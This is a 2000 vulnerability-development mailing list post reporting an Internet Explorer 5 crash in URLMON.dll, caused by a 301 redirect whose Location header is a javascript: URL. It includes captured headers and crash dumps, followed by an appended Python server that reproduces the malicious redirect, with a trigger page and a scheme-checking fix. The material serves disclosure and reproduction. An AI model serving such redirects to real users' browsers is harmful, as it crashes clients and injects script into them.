Vulnerability Development mailing list archives

IE5 crash


From: Dzzie Z <dzzie () YAHOO COM>
Date: Sat, 23 Dec 2000 06:49:47 -0500

Hi, I stumbled across this crash for IE. I am on 5.00.2614.3500 in Win98SE; it
seems pretty reproducible, with an illegal op in URLMON.dll.

1) Create a web page (local is fine) and put in an image pointing to one of your
servers. This crash doesn't even need an image extension on it; just aim it
at a directory or script (it works the same when the URL is requesting an image as well).

2) Have the server return the 301 found code with a Location of
'javascript:<some js command>' = instant crash of IE.

When I first started playing with this it was crashing Explorer; I can't
reproduce the Explorer crash anymore, but I have also updated my scripting
engines and added J++.

Here are the exact headers sent back and forth to the server on the request,
and the crash log.

Just to clarify: the 'Server: Unix' thing is BS I put in when making the
server.


[ Browser Request for http://127.0.0.1/ ]
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: 127.0.0.1
Connection: Keep-Alive


[ Server Response Headers ]
HTTP/1.1 301 Moved Permanently
Server: Apache/1.3.11 (Unix)
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 62
Connection: Close
Content-Type: text/html
Location: javascript:with(navigator){n='\n';alert(userAgent+n+platform)}


IEXPLORE caused an invalid page fault in
module URLMON.DLL at 0187:77037fb8.
Registers:
EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010206
EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
ECX=77034258 DS=018f ESI=00434048 FS=4c77
EDX=81706d60 ES=018f EDI=00000001 GS=0000
Bytes at CS:EIP:
8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
Stack dump:
00000000 00000001 00433ec0 77037d5e 00434048 00000000 00000000 7af2a370
01149a60 00000000 017beb60 7ad906c0 00000001 00000000 01149b48 01149a60


==============================================

[ Browser Req for 127.0.0.1/image.gif ]
GET /image.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: 127.0.0.1
Connection: Keep-Alive


[ Server Response Headers ]
HTTP/1.1 301 Moved Permanently
Server: Apache/1.3.11 (Unix)
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 86
Connection: Close
Content-Type: text/html
Location: javascript:document.write('IE is so BUGGY'+' of course we are kind of abusing it too')


IEXPLORE caused an invalid page fault in
module URLMON.DLL at 0187:77037fb8.
Registers:
EAX=00000000 CS=0187 EIP=77037fb8 EFLGS=00010202
EBX=00000000 SS=018f ESP=017beb08 EBP=017beb30
ECX=77034258 DS=018f ESI=0043407c FS=4c1f
EDX=8171e8c4 ES=018f EDI=00000001 GS=0000
Bytes at CS:EIP:
8b 08 50 ff 51 18 6a 00 8b ce 8b f8 e8 82 c3 ff
Stack dump:
00000000 00000001 00433ef4 77037d5e 0043407c 00000000 00000000 7af2a370
01149cd0 00000000 017beb60 7ad906c0 00000001 00000000 01149db8 01149cd0


The question is:

Can anything more interesting be done with this crash?
Can anyone else reproduce?
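The two-step setup described in the post, as an added example that is not part of the original message or the author's own server: a minimal Python server that answers every request with exactly the kind of 301 shown in the captured headers (a Location whose scheme is javascript:), the local trigger page with an <img> aimed at it, and the check a client should apply before following a redirect (only http/https targets are real network redirects). The JS payload is taken from the first capture; the Apache banner is cosmetic, as the post says, and the host/port are assumptions for local use.

```python
"""Reproduction harness for a 301 whose Location is a javascript: URL.

Added example; the server banner, host and port are assumptions for local use.
"""
import html
import socketserver
import threading
from urllib.parse import urlsplit

# Payload from the first capture in the post (the second used document.write()).
JS_PAYLOAD = "with(navigator){n='\\n';alert(userAgent+n+platform)}"
BODY = b"<html><body>moved</body></html>"  # constructed placeholder body


def build_redirect_response(js, status_line="301 Moved Permanently"):
    """Raw HTTP/1.1 response bytes: a 301 with a javascript: Location.

    Content-Length is derived from BODY so the headers stay self-consistent.
    """
    headers = [
        "HTTP/1.1 " + status_line,
        "Server: Apache/1.3.11 (Unix)",  # cosmetic banner, as in the capture
        "Pragma: no-cache",
        "Content-Length: %d" % len(BODY),
        "Connection: close",
        "Content-Type: text/html",
        "Location: javascript:" + js,
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode("latin-1") + BODY


def parse_response(raw):
    """Split raw response bytes into (status line, {header: value}, body).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_network_redirect_target(location):
    """Check a client should make before following a 3xx Location.

    Only http/https targets are real redirects; javascript:, data:, file:
    and similar schemes must not be handed to the navigation/script engine.
    """
    return urlsplit(location).scheme.lower() in ("http", "https")


def build_trigger_page(server_url):
    """Step 1 of the post: a local page whose <img> points at the server."""
    return '<html><body><img src="%s"></body></html>' % html.escape(
        server_url, quote=True
    )


class RedirectHandler(socketserver.StreamRequestHandler):
    """Consumes the request line and headers, then sends the 301 to any request."""

    def handle(self):
        while self.rfile.readline().strip():  # stop at the blank line after headers
            pass
        self.wfile.write(build_redirect_response(JS_PAYLOAD))


def serve(host="127.0.0.1", port=0):
    """Start the redirecting server on a background thread; returns (server, url)."""
    srv = socketserver.TCPServer((host, port), RedirectHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://%s:%d/image.gif" % srv.server_address


if __name__ == "__main__":
    server, url = serve()
    with open("trigger.html", "w") as fh:  # open this page in the browser under test
        fh.write(build_trigger_page(url))
    print("serving 301 -> javascript: at", url, "(trigger.html written)")
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        server.shutdown()
```

Running the script and opening trigger.html in the browser under test reproduces the exchange in the captures; the same server answers "/" and "/image.gif" identically, matching the observation that the request path does not matter. The is_network_redirect_target() check is the client-side fix a practitioner would want: a redirect target that is not http or https should be dropped rather than passed on as a URL to navigate.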

